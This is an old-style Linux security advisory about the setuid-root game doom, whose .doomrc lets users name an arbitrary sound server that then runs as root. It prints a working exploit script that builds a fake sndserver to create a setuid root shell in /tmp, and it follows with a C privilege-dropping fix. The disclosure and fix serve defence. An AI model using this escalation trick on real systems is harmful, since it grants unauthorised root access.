COMMAND

    doom

SYSTEMS AFFECTED

    Linux

PROBLEM

    The user is allowed to set a sound server in his/her .doomrc.
    Normally, this is set to "sndserver".  However, this can be set to
    *any* program, and that program runs as root!!  The exploit script
    below shows that stupidity.


        #!/bin/sh
        # Tue Dec 17 10:02:20 MET 1996 Bo
        echo 'sndserver "/tmp/sndserver"' > .doomrc
        cat > /tmp/sndserver.c << EOF
        #include <stdio.h>
        #include <unistd.h>
        main() {
                if (fork()) while (getc(stdin));
                else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
                        /* or whatever you like to do */
        }
        EOF
        gcc /tmp/sndserver.c -o /tmp/sndserver

    The fork() is just so that doom runs on nicely without locking
    up the keyboard and sndserver gobbles up all the sound data
    sent to it. Run the script, start sdoom, quit the normal way, and
    execute /tmp/sh.

SOLUTION

    Erase that stupid game!
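
    For anyone keeping the game, the code-side fix is to give up root
    before running whatever .doomrc names as the sound server. The C
    below is an added example, not code from this advisory or from
    doom; drop_privileges() and spawn_sndserver() are hypothetical
    names, and it assumes the game binary is setuid root.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently return to the invoking user's ids (assumption: the binary
 * is setuid root). Group first: setgid() fails once root is gone.
 * Returns 0 on success, -1 on failure. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    /* A non-root caller must not be able to get root back. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    if (geteuid() != ruid || getegid() != rgid)
        return -1;
    return 0;
}

/* Run the user-configured sound server (the sndserver path from .doomrc)
 * as the invoking user. This demo waits for the child; a game would keep
 * it running and feed it sound data instead. Returns the child's exit
 * status, 127 if exec fails, 126 if the drop fails, -1 on fork/wait error. */
int spawn_sndserver(const char *path)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);          /* never exec while still privileged */
        execl(path, path, (char *)NULL);
        _exit(127);              /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

    With the drop in place, a sndserver entry pointing at an arbitrary
    program still runs, but only with the rights the user already has.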